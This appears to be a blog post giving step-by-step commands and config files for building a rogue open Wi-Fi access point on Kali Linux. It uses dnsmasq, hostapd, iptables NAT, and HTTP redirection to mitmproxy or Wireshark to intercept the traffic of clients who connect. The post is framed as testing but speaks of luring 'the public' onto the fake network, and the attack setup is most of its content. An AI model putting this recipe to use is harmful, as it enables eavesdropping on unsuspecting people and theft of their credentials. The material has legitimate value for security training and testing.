1.) You need the TP-LINK TL-WN722N (this one should be the most compatible)
2.) Install the Kali Linux in VM (https://www.kali.org/downloads/)
3.) Start your Kali Linux, connect your TP-LINK usb thing to the VM.
4.) Type "ifconfig -a" to check which one should we use, in this case we will use "wlan0"
5.) Type "ifconfig wlan0 10.0.0.1/24 up" to bring it as the gateway. remember to kill the process that may be interfering, you can type the command "airmon-ng check kill"
6.) Install dnsmasq and hostapd if you haven't (apt-get install dnsmasq hostapd)
7.) After installation, create the config file for dnsmasq (vi dnsmasq.conf)
--------------------------------
interface=wlan0 dhcp-range=10.0.0.10,10.0.0.250,12h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=8.8.8.8 log-queries log-dhcp
--------------------------------
8.) create the config file for hostapd (vi hostapd.conf), "MYMITIMTEST" is the SSID that we want the others to connect (by the way, spelling mistake, MITM became MITIM here, but it doesn't matter as it's for testing only :)...)
--------------------------------
interface=wlan0 driver=nl80211 ssid=MYMITIMTEST channel=1--------------------------------
9.) Start dnsmasq by "dnsmasq -C dnsmasq.conf", if you encounter "failed to bind DHCP server socket: Address already in use", you can type "killall -9 dnsmasq" to kill it first ;)
10.) Start hostapd by "hostapd ./hostapd.conf", or simply put everything into a script like below:
11.) After starting the wifi, we have to do the routing. Open the new terminal and type the commands:
sudo sysctl -w net.ipv4.ip_forward=1 sudo iptables -P FORWARD ACCEPT sudo iptables --table nat -A POSTROUTING -o eth0 -j MASQUERADE12.) you will also want to capture the traffic of the clients, so you can use mitmproxy or wireshare.
12a.) if you use mitmproxy, you simply forward the traffic of port 80 to 8080 (we just try port 80 here, if you wish to do 443 as well, you will have to install the cert to clients first)
type the command:
mitmproxy -T --host sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
12b.) if you want to use wireshark, just open wireshark, and choose "wlan0" as the interface.
So basically you have already set up the AP which allows the public to connect, so in client side, what will it look like?
suppose a phone is trying to connect to this AP.....
"MYMITIMTEST" was found, such a relief to find a FREE OPEN WIFI! :)
and the signal is strong!
Browsing as usual, we use "demo.testfire.net" as example this time
No comments:
Post a Comment